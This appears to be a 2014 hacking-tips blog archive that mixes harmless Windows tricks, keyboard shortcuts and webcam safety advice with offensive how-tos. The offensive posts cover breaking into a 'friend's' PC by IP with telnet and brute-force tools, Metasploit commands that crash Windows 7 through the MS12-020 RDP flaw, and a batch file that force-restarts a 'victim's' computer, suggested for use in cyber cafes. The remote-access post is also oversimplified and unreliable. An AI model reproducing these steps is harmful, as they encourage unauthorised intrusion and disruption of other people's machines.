Showing posts with label Computer. Show all posts
Showing posts with label Computer. Show all posts

28/11/2014

Hack Any Remote PC By IP Address Using Kali Linux


This is how we can get the IP address of the victims website. How about your friend’s PC? You can’t do www.yourfirend’ sname.com, can you? Finding your friend’s IP address is a little tough job, for you and tougher it is if he has dynamic IP address that keeps changing. But in our case, Finding friend’s/victim's IP address is as easy as A, B, C.
I'll show you one of the widely used method to detect IP address of your friend is by chatting with him or go through Find someone's IP address! in order to get IP address.
Now you got the IP address right? Is it online? To know the online status just ping the IP address, if it is online it will reply. If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily. Use Advanced Port Scanner to scan all open and venerable ports.
Read Also:-Hack Into Emails And Facebook Using Kali Linux

Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > Add windows components. Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port].

You’ll be asked to input login information.

If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like Brutus, THC- Hydra In this way you’ll able to hack remove computer using only IP address.
Love this article?
Share it with your friends on Facebook

22/11/2014

Find your computer's Gender


My girlfriend (S. Pandey) always complains that I love my computer more than her. And I always reply, “Baby, its only a machine”. On that she often comments that if ever machines have gender my computer would be a girl. Turns out, she is right. Today, i decided to share this brilliant trick to let you know whether your computer is a male or a female?
There is a way you can find out your computer's gender. Simple follow the instructions below:
1. Open your notepad
2. Type or copy the codes written below:
paste:CreateObject(“SAPI.SpVoice”).Speak”baby I love you”
3. Save as computer_gender.vbs 4. Run the file.
Now, if you hear a male voice its a boy and if you hear a female voice, its a girl.
Note: Type above mentioned carefully otherwise, you hear nothing.
Don’t forget to tell me what is your computer, a boy, a girl or a bitch. Smiley
Honestly, mine is a girl.
Read Also:- Make your Computer Welcome You
Make your Computer Talk.
On a serious note, this depends upon the voice you have selected in Microsoft Text to Speech options.
Love this article?
Share it with your friends on Facebook

Make your Computer Talk


Intelligent machines capable of speech are often the stuff of futuristic sci-fi movies, but you can turn any computer into a chatty Cathy. Even though we aren’t yet at the stage with computers where they can interact with us like people, there are a few tools and simple scripts we can write to make any computer that is running Windows speak to us. Well, if you wish to know how to do this, then keep scrolling. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.
Read Also:- Make your Computer Welcome You
To create one such talk script, follow the steps given below:
Step 1. Open Notepad.
Step 1. Copy and paste the exact code given below.
Dim Message, Speak
Message=InputBox("Enter text","Speak")
Set
Speak=CreateObject("sapi.spvoice")
Speak.Speak Message
Step 3. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
Step 4. Double click on the saved file, a window will open. Enter some text in enter text column and click OK.
Now your Computer will speak/talk what you typed in Step 4.

Windows Compatibility

This VBS file can be executed on all versions of Windows including Windows XP,Windows Vista, Windows 7 and Windows 8.
Personal Experience: I personally showed this trick to many of my friends at LUMS when i was doing Ph.D in mathematics and they were literally left awestruck. You too can impress your friends by making your PC talk and be the Computer Wiz.
Love this article?
Share it with your friends on Facebook

Make your Computer Welcome You


If you use to watch Hollywood Sci -Fi movies, you must saw a scene in which the computer welcomes the user by speaking his name in the computerized voice.This looks quite impressive, but You can easily make your Windows PC to speak a welcome greeting note for you at windows start up.This is very simple and easy to implement trick but when you start your computer in front of your friends or anybody, they will be wondered by listening your name.So If you want to impress your friends with your technical and programming skills,you must try this.This is very cool and interesting trick to impress someone. This article describes exactly how you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username." (i make my computer "Welcome to your PC, Johnelwin").
Read Also:- Make your Computer Talk
Make Windows Greet you with a Custom Voice Message at Startup To use this trick, follow the instructions given below:
1. Click on Start. Navigate to All Programs, Accessories and Notepad.
2. Copy and paste the exact code given below.
Dim speaks, speech
speaks="Welcome to your PC,
Username"
Set
speech=CreateObject("sapi.spvoice")
speech.Speak speaks
3.Replace User name with your own name.
4. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs
5. Copy the saved file.
6. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup In Windows XP and to C:\Users\{User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup In Windows 8 , Windows 7 and Windows Vista if C: is your System drive. App Data is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
7. Paste the file. Now when the next time you start your computer, Windows will welcome you in its own computerized voice.
Note: For best results, it is recommended to change sound scheme to No Sounds. You can change the sound scheme to No Sounds by following the steps given below:
1. Go to Control Panel.
2. Then click on Switch to Classic View.
3. Then Click on Sounds and Audio Devices.
2. Then Click on the Sounds Tab.
5. Select No Sounds from the Sound Scheme option.
6. If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
7. Click on OK.
Try it yourself to see how it works. In my personal opinion, this is an excellent trick. Whenever I start my PC in front of anybody and the PC welcomes me, the fellow is left wondering how brilliant a computer do I have.
Love this article?
Share it with your friends on Facebook

21/11/2014

Webcam Safety Tips: Are You Being Watched Through Your Webcam?


Webcam Safety Tips

A few clicks of the mouse, and your webcam is activated and ready to be used. But have you considered the possibility that someone else could be watching you through your own webcam?
Read Also:- How to use your phone as a wireless keyboard and mouse for your PC
Well, strictly speaking, if your computer is secure and uninfected, can’t be accessed remotely, and has strong password, locked case, tied up with string to prevent people from accessing it when unattended, then no worries, you’re good.

How Webcams Get Hacked
Hackers utilize a type of software called Remote access tool (RAT) that allows them to remotely access a computer as if they were physically there. Though RATs were designed for legal purposes, like allowing a technician to remotely access a user’s computer to troubleshoot problems without having to physically be there, hackers exploit this software for their own benefit.
Typically, a hacker lures an unsuspecting user into clicking on a link, opening a picture or email attachment, visiting a specific website, or downloading some software. After the user falls for one of these, the RAT software is secretly installed onto the user’s computer. The hacker now has remote access to the user’s computer.

Preventing Your Webcam from Being Hacked
Many articles recommend covering the lens of the webcam with a piece of paper to prevent hackers from spying on you. But doing that alone is brushing the real problem under a rug. Having your webcam hacked means your PC has been compromised by some malware, and you need to take immediate action to get rid of it. Here are some easy things you can do that can prevent your computer from being compromised in the first place.

Don’t Click on Unknown Links
Hackers lure victims into installing RAT software onto their PC by disguising links, pictures, or email attachments as something desirable, such as free music, movies, or desktop wallpapers. Be wary of suspicious websites that offer similar items. Also be cautious about clicking on shortened links you may find on social media sites.

Equip your computer with an antivirus and two-way firewall
Having an antivirus and two-way firewallis minimum security any PC should be equipped with. An up-to-date and active antivirus helps to detect and remove malware from infecting your computer. A two-way firewall monitors inbound and outbound traffic to-and-from your computer.

Be cautious of tech support offering remote assistance
Hackers may physically contact you by claiming there are problems with your computer. They’ll try to persuade you to install a program that allows them remote access to your computer, so that they can fix the problem. Simply ignore calls from those who claim they are tech support.

Secure your wireless connection
A hacker can easily hack into unsecure Wi-Fi networks with a laptop, antenna, and widely available software. Don’t make it easy for them. Secure your wireless connection with a strong and complex password.

Disable Windows Remote Access
Though most RATs deployed by malware are custom tools, disabling Windows Remote Assistance and Remote Desktop is one thing you can do to prevent hackers from remotely accessing your computer.
Love this article?
Share it with your friends on Facebook

20/11/2014

How Hackers Hack Bank Accounts and Personal Information

Most people learning hacking always have a keen interest in knowing that how they can hack bank accounts of other people. But most of them find it pity much difficult such that now they have made a perception that bank account information like credit cards or debit cards or net banking passwords cannot be hacked. Its truth to an extent that hacking Banking account information and credit or debit cards passwords is most difficult and almost impossible part. Today i will discuss with you why hacking bank account information is tough and always considered as impossible task. We will also discuss the different methods that hackers use to hack bank account information nowadays.
Recommend Post What Is Keylogger And How To Be Safe From Keyloggers

I am quite sure that almost everybody using internet nowadays uses that internet to pay online bills, book reservation tickets, purchase online things or simply transfer money i.e. involved in at least some kind of online transaction that is related to money i.e. banking information, credit or debit card payments or simply Net banking. Most of banks uses SSL (Secured Sockets Layer) connection and at least 128 or 256 bit encryption for online banking and transaction purposes. Also now an extra layer of security is introduced that is called transaction PIN layer means for each and every online transaction you have to enter your passwords and during transaction you have to enter PIN (a type of password that varies 4 to 8 chars in length). Thus bank do alot of work to protect your secret information and credentials from the eyes of the world that may wish to gain access to your such a vital information.
Below example will illustrate you how powerful the encryption method is:
* . 40 bit encryption, means there are 2^40 possible keys that could fit into the lock that holds your account information. That means there are many billions of possible keys that means brute forcing such thing is imposable. Only thing now left is dictionary and rainbow attack. But its not only the security measure that banks used to secure there information. Also its only 40 bit encryption.
* . 128 bit encryption means there are 2^88 times as many as key combinations that are being possible for 40 bit encryption. That means a computer would require exponentially more processing power and time than for 40-bit encryption to find the correct key. That's a very powerful method of encrypting data sent from your machine to bank machine. But unfortunately it's all is useless to you once your system has been compromised or hacked. Now How these all security Encryption can be bypassed and your system can be compromised online. There are several methods for exploiting and bypassing such account information Some of them are:
1. Phishing
Read Also How to create fake or Phishing web page for Gmail
2. Trojans
3. Session Hijacking
Warning: This blog contains materials that can be potentially damaging or dangerous. If you are looking to comment a crime, you must leave this site now! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational, public awareness and research purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this blog nor the author(s) of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions.
We http://deadlyuniversityspy.blogspot.com/ are providing a lot of hacking tutorials, methods to crack passwords and other similar stuffs in order to develop hackers attitude to learn self defence from Computer Criminals attack and to detect the ways in which hackers can infiltrate your system.
Love this article?
Share it with your friends on Facebook

12/11/2014

Remotely Access Kali Terminal Using Putty

In this post we will use PuTTy to remotely or locally access Kali terminal with root priveleges. We will use SSH for this tutorial, though you can use Telnet or any other mode too.

Putty
Some theoretical inforamtion about putty for your digestion. PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows platform. PuTTY is open source software that is available with source code and is developed and supported by a group of volunteers. ( putty.org) PuTTY is a popular SSH and Telnet client that helps you establish secure connections over the Internet and doesn’t even require installation. It’s especially aimed for programmers and network administrators, which means that new comers won’t find it easy to use. The program features a simple, straight forward interface with no included documentation. Despite its apparent simplicity, PuTTY is highly configurable and includes many options to tweak connections, sessions, SSH security features and even the window’s appearance. (softpedia). Basically what you need to know is Putty works on Windows and will help you execute commands on Virtual install of Kali directly from Windows. It’s like a Kali terminal in Windows. What that means is if you have any configuration other than Windows Host and Kali Guest, then PuTTy isn’t going to be useful ( you can still use it for remotely running Kali, but the focus is on host guest mechanism here).

Download
You can download putty from putty.org That’s the official download location. Softpedia, CNET, etc. also provide downloads. You will find a lot of links there, and it will take a minute to find out what you need to download. However, for the sake of ease, the link below this line is likely to be what you are looking for.

Kali Configuration
There are a few things that need to be done before PuTTy starts working. Firstly, you would be using SSH to connect to Kali (main advantage of SSH is that it’s secure, you can search google for more info on SSH). By default, the SSH service isn’t started in Kali, but you can still check with
root@kali:~#service –status-all [ - ] ssh
It will display a long list. The–against ssh indicates it is not running. Depending on whether the SSH is installed or not, you can execute the following. Run the second command first, if it works fine the installation isn’t required, if not, then execute first command.
root@kali:~#apt-get install openssh-server(to install SSH) root@kali:~#service ssh start(to start the service)
Optional: If you are connecting remotely and are afraid that someone will eavesdrop your data, then you can use public private key encryption offered by SSH. For this you need to create an RSA key. root@Kali:~#ssh-keygen -trsa You will have to specify where to store the key (just press enter for default location) and then specify a key. This step is quite unnecessary for most users. Also, type ifconfig to get your eth0 ip address.

Starting PuTTy on Windows

Start Putty, and you will see a putty configuration dialog. Enter the IP that you found out in the last step. The port will be 22 and connection type SSH. Click open and you’ll be prompted to enter the credentials for terminal access. Type in ‘root’ and your password. You can run commands from here and they will be executed on your Kali machine. There are no functionality restrictions as such, and you can do almost anything from this terminal. Type exit to end the session.

Auto start SSH on Kali Boot

Now every time you will boot into Kali, the SSH service will not be running. You will have to type the following everytime to boot service ssh start. However, there are alternatives. One straight forward one is to go to Applications -> System Tools -> Preferences -> Startup Application and click on add. Enter the command asservice ssh start and add whatever you feel like for Name and Comment. Alternatively, you can use update-rc.d to get the same functionality. It helps add/remove services which will run at booting. Execute the following command to add SSH to startup services root@kali:~#update-rc.d ssh enable You can of course write your script to start ssh, but that wouldn’t do us much good since starting the service is as easy as one line of code and you don’t write scripts that execute just one command that is quite an inefficient way of using putty scripts.

11/11/2014

Connect a Laptop or Desktop Computer to a TV Easily

Suppose you wish to watch a movie or share a slide-show of pictures with your family on your PC but have a screen that leaves much to be desired. In such a situation, you can connect your computer to a television screen to allow your entire family to enjoy comfortably. There are many ways in which you can connect your laptop/computer to a television. However, the overall video quality will be different for different methods. You can choose which one to use based on the quality or the availability of hardware. The first step is to know what type of ports and connections your TV and computer have. If you already know the type of ports and connections available on your hardware, you can directly jump to Step 2. If not, then the different types of ports are explained in detail below

1. RCA/Composite: The oldest and the lowest quality connection available. They are the Yellow, Red and White connections most of us are familiar with. Yellow is used for composite video, white for left analog audio and red for right analog audio.
2. S-Video: S-Video or Super Video offers slightly better quality than Composite connections. As it is one of the oldest type of connections available, most televisions and computers have it. There are two types of S-Video ports, one containing 4 pins and the other containing 7 pins. This type of connection is used only for video. So you will need to connect an audio cable from your computer's headphone jack to the red and white audio inputs on your TV if you want audio to work.
3. VGA (Video Graphics Array): Most computers and televisions have a VGA port. It offers much better quality than S-Video and should be preferred if you have a HDTV. Older CRT TVs however, will not have a VGA port and will require a PC to Television converter. Just like S-Video, VGA also does not support audio and will require an additional audio cable.

4. DVI: Digital Video Interface offers much better quality than VGA connections. Most laptop computers and HD TVs will have these connections. Just as the name suggest, this type of connection can be used only with digital TVs. Also like the previous two, DVI connections also require the use of an audio cable for audio to work.
5. HDMI: The highest quality connections available. Most HD TVs will have this connection, however, chances are that your computer would not. If your computer happens to have a HDMI connection port, this should be preferably used. If your computer doesn't, you can use an HDMI to DVI adapter to convert HDMI to DVI.
Step 2: Once a common type of port between the two devices is recognized, you will need the right connector cable to physically connect them. The different types of connector cables are pictured above. If you do not find two matching types of connection ports, you will need an adapter to make the connections type match.
Step 3: After connecting the two devices, on your TV, select the external input with which your TV is connected to the computer. It may be HDMI1 or AV1 depending on how you have made the connection. This is much similar to how you select input from your DVD player. If you have followed the steps correctly, your TV should now be displaying your computer's screen.
Important: If your computer is not recognizing the external display, you must connect the TV before starting your computer. If the picture appears distorted, you will need to change the screen resolution of your TV by altering the display settings from your computer. Most older TVs will support only one display resolution while newer TVs will support plenty of them.
Love this article?
Share it with your friends on Facebook

10/11/2014

Penetration Testing: Crash Windows 7 Using Metasploit and RDC Vulnerability


Crashing Windows 7
Now while the story so far has been smooth and cozy, it gets a bit tough from here on. For modern operating systems like Windows 7, there aren’t any magical exploits like the ones we had for unpatched Windows XP machines. We had been able to hack Windows XPand try some meterpreter features on the exploited XP machine. However, when it comes to Windows 7, there aren’t any direct exploits for gaining access to the machine. We can try some client side attacks, etc. Social engineering toolkit would be great for stuff like that. However, there is still one vulnerability that waits to be exploited. In Windows 7, there is a hole in the RDP port (3389) which can work over LAN as well as over the internet. Over the internet stuff can get a bit tougher, however on the LAN, this should be a piece of cake if you have successfully followed out pentest tutorials so far.

Requirements
Now you will require an attacker Kali machine, and a victim Windows machine, both running on Virtual machines. Windows 7 should be a fresh install, with no updates, as they can patch the vulnerability, making it unexploitable. Now when you have got all this setup, you can move on to further steps.

Information Gathering
Now you’ll have to find out the IP of out victim. This would have been complicated in a real life scenario, but in our case, you just go to Windows 7, open command prompt, and type ipconfig You should be looking for IPv4 address of Local Area Network.

In our case thats where the information Gathering Stops.

Starting Metasploit
Now execute the following commands to start metasploit framework.
service postgresql start
service metasploit start
msfconsole

Exploit
Now select the exploit that we are going to be using.
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Now do a show options, it will tell you that it only requires two options, RHOST and RPORT. Rport is obviously 3389, the remote desktop port. The RHOST is the one you found out in the information gathering step. use the following code to set the RHOST set RHOST 192.168.—.—
Surprising as it may seem, we are done already. Just type exploit and The target machine will get a Blue Screen of Death and will reboot. You can do this as many times as you feel like, and in real life scenario, it can be really annoying, considering it can be done over the internet too.

Possible Problems

If you get an error of this sort, then most probably your Windows 7 machine has firewall enabled, and is blocking your packets. An antivirus could do the same thing. There might be some issues with the LAN connection too. A good diagnosis test would be to ping the machine. Go to a kali terminal and execute ping 192.168.—.—
After waiting for a while, press ctrl C which will stop the pinging.

If you get something like this (0 packets received), then there is absolutely no communication between the Kali and Windows machine (in effect, they are not on the same network, even though they are). That’s why the exploit doesn’t work.

Something like this means that the connection is just fine, and probably the Windows machine has become immune to the attack due to some patch. Look Here If its the former case, then you’ll have to find a way to get the connection working, and if its the latter, then try disabling firewall, antivirus, and maybe setting the network as home instead of public. Then go to advanced sharing settings, and choose all the options that you think will make your computer easier to hack. If possible, see if you can uninstall updates. The final thing to do is to get an early unpatched release of Windows 7. In some cases installing VMware tools might help.

Enable Remote Desktop
In many Windows releases, remote desktop is turned off by default. To enable it, follow these steps:
Go to System Control Panel\System and Security\System). Click on Remote settings. Select the “Allow Remote Connections to this computer” button. Click OK.
Love this article?
Share it with your friends on Facebook

04/11/2014

How to Type Faster: Tips and Tricks to Master the Keyboard

We all know that typing speed matters. Whether you’re applying for a job as a paralegal or an executive assistant, being able to type quickly and accurately might be the only skill that stands between you and another equally qualified applicant. Can you type 65 words per minute? If you didn’t have the benefit of taking a typing course or two in school, that might not be the case. So, how do you get those skills up to par in a short period of time so that you can compete for these high paying positions?

Learn How to Touch Type
Touch typing is all about the idea that each finger has its own area on the keyboard and you can type without looking at the keys. Practice regularly and your fingers will learn their location on the keyboard through muscle memory.

Sitting Posture For Typing

→ Sit straight and remember to keep your back straight.
→ Keep your elbows bent at the right angle.
→ Face the screen with your head slightly tilted forward.
→ Keep at least 45 - 70 cm of distance between your eyes and the screen.
→ Еxpose the shoulder, arm, and wrist muscles to the least possible strain. The wrists can touch the table top in front of the keyboard. Never shift your body weight to the wrists by resting on them.

Home Row Position

Curve your fingers a little and put them on the ASDF and JKL keys which are located in the middle row of the letter keys. This row is called HOME ROW because you always start from these keys and always return to them. F and J keys under your index fingers should have a raised line on them to aide in finding these keys without looking.

Кeyboard Scheme

The color-coded keyboard under lesson input field will help you to understand which finger should press each key.
→ Hit keys only with the fingers for which they have been reserved.
→ Always return to the starting position of the fingers ASDF – JKL
→ When typing, imagine the location of the symbol on the keyboard.
→ Establish and maintain a rhythm while typing. Your keystrokes should come at equal intervals.
→ The SHIFT key is always pressed by the pinky finger opposite to the one hitting the other key.
→ Use the thumb of whichever hand is more convenient for you to press the Space bar. This method may seem inconvenient at first, but do not stop, eventually you’ll find out that you are typing quickly, easily and conveniently.

Fingers Motion

Don't look at the keys when you type. Just slide your fingers around until they find the home row marking. Limit your hand and finger movement only to what is necessary to press a specific key. Keep your hands and fingers close to the base position. This improves typing speed and reduces stress on the hands. Pay attention to ring fingers and little fingers, since they are considerably under developed.

Typing Speed
→ Do not rush when you just started learning. Speed up only when your fingers hit the right keys out of habit.
→ Take your time when typing to avoid mistakes. The speed will pick up as you progress.
→ Always scan the text a word or two in advance.

Use All Ten Fingers
Relearn the correct finger placement on the keyboard. If you take a closer look at your keyboard, you’ll notice raised bumps on each of the F key and J key. This is to help you find the correct finger placement without having to look at the keyboard.
Love this article?
Share it with your friends on Facebook

31/10/2014

100 Amazing Keyboard Shortcuts and Their functions (Windows)


Getting familiar with keyboard shortcuts not only help you get the work done faster, but also more efficient.
Introduction: Keyboard shortcut is a sequence or combination of keystrokes on a computer keyboard which invokes commands in software. Some keyboard shortcuts require the user to press a single key or a sequence of keys one after the other. Other keyboard shortcuts require pressing and holding several keys simultaneously. Keyboard shortcuts may depend on the keyboard layout. Keyboard shortcuts are a common aspect of most modern operating systems and associated software applications. Their use is pervasive enough that some users consider them an essential element of their routine interactions with a computer. Whether used as a matter of personal preference or for adaptive technology
There are various types of Keyboard shortcuts, so I have grouped them up in different Categorizes below:
The General Shortcuts
Dialog Box Keyboard Shortcuts
MMC Console Window Keyboard Shortcuts
Remote Desktop Connection Navigation
Accessibility Keyboard Shortcuts
Microsoft Natural Keyboard Shortcuts
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
Windows Explorer Keyboard Shortcuts
Shortcut Keys for Character Map
Internet Explorer navigation
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



Accessibility Keyboard Shortcuts
Right Shift for eight seconds =Switch Filter Keys either on or off
Left Alt + left Shift + PRINT SCREEN = Switch High Contrast either on or off
Left Alt + left Shift + NUM LOCK = Switch the Mouse Keys either on or off
Shift five times = Switch the Sticky Keys either on or off
NUM LOCK for five seconds = Switch the Toggle Keys either on or off
Win + U = Open Utility Manager
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



Microsoft Natural Keyboard Shortcuts
Win = Display or hide the Start menu
Win + BREAK = Display the System Properties dialog box
Win + D = Display the desktop
Win + M = Minimize all of the windows
Win + Shift + M =Restore the minimized windows
Win + E =Open My Computer
Win + F =Search for a file or a folder
CTRL + Win + F = Search for computers
Win + F1 = Display Windows Help
Win + L = Lock the keyboard
Win + R = Open the Run dialog box
Win + U = Open Utility Manager
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



Dialog Box Keyboard Shortcuts
CTRL + Tab = Move forward through the tabs
CTRL + Shift + Tab = Move backward through the tabs
Tab = Move forward through the options
Shift + Tab = Move backward through the options
Alt + Underlined letter = Perform the corresponding command or select the corresponding option
Enter = Perform the command for the active option or button
Spacebar = Select or clear the check box if the active option is a check box
Arrow keys =Select a button if the active option is a group of option buttons
F1 key = Display Help
F4 key = Display the items in the active list
Backspace = Open a folder one level up if a folder is selected in the Save As or Open dialog box
Love this article?
Share it with your friends on Facebook

30/10/2014

Computer keyboard shortcut keys



The General Shortcuts
We’ll kickoff the list with some really general shortcuts that you often used.
CTRL + C =Copy
CTRL + X = Cut
CTRL + V = Paste
CTRL + Z = Undo
Delete = Delete
Shift + Delete = Delete the selected item permanently without placing the item in the Recycle Bin
CTRL while dragging an item = Copy the selected item
CTRL + Shift while dragging an item = Create a shortcut to the selected item
F2 key = Rename the selected item
CTRL + RIGHT ARROW =Move the insertion point to the beginning of the next word
CTRL + LEFT ARROW = Move the insertion point to the beginning of the previous word
CTRL + DOWN ARROW = Move the insertion point to the beginning of the next paragraph
CTRL + UP ARROW = Move the insertion point to the beginning of the previous paragraph
CTRL + Shift with any of the arrow keys =Highlight a block of text
Shift with any of the arrow keys = Select more than one item in a window or on the desktop, or select text in a document
CTRL + A = Select all
F3 key = Search for a file or a folder
Alt + Enter = View the properties for the selected item
Alt + F4 = Close the active item, or quit the active program
Alt + Enter = Display the properties of the selected object
Alt + Spacebar = Open the shortcut menu for the active window
CTRL + F4 = Close the active document in programs that enable you to have multiple documents open simultaneously
Alt + Tab = Switch between the open items
Alt + ESC =Cycle through items in the order that they had been opened
F6 key = Cycle through the screen elements in a window or on the desktop
F4 key = Display the Address bar list in My Computer or Windows Explorer
Shift + F10 = Display the shortcut menu for the selected item
Alt + Spacebar = Display the System menu for the active window
CTRL + ESC = Display the Start menu
Alt + Underlined letter in a menu name = Display the corresponding menu
→Underlined letter in a command name on an open menu = Perform the corresponding command
F10 key = Activate the menu bar in the active program
RIGHT ARROW = Open the next menu to the right, or open a submenu
LEFT ARROW = Open the next menu to the left, or close a submenu
F5 key = Update the active window
Backspace = View the folder one level up in My Computer or Windows Explorer
ESC = Cancel the current task
Shift when you insert a CD-ROM into the CD-ROM drive = Prevent the CD-ROM from automatically playing
Love this article?
Share it with your friends on Facebook

19/02/2014

Shutdown Any Computer Remotely Using Command Prompt (CMD)


You may try this trick at any cyber cafe.
1. Open the command prompt. This may be done by clicking on the Start button and selecting Run.
2. Type cmd and press Enter.
3. Type shutdown -m\\computername,replacing"computername" with the name of the computer you wish to shutdown or the computer's IP address.
4. Experiment with the shutdown command's switches.
-r will force a restart, disabling any services or user interaction from interrupting it.
-c "comment" will force a comment to appear on the system being shutdown.
-t xx will force a timeout for "xx" seconds. For example, -t 60 would perform a shutdown after a 60-second timeout.
-a will abort the shutdown.
A full command example: shutdown -m\\myserver-r -c "This system will shutdown in 60 seconds" -t 60

ALTERNATIVE
1. Type shutdown -i in the run window.
2. Click the Add box and type the name of the computer you want to shutdown or its IP address. You can select what you want the computer to do.
3. In this mode, it's necessary to add a comment. Do so. Press OK.

INTERESTED IN .BAT FILES
1. Open Notepad and type:
@echo off echo.
set /p vic=Enter the IP of your victim:
shutdown -m \\%vic% -r -c "Your computer has been hacked. Shutdown in 20 seconds" -t 60
echo Victim Hacked....
pause
exit
2. Save it as anything.bat.
3. When you run it, it'll ask for your victim's IP. Enter it and you are done.
Love this article?
Share it with your friends on Facebook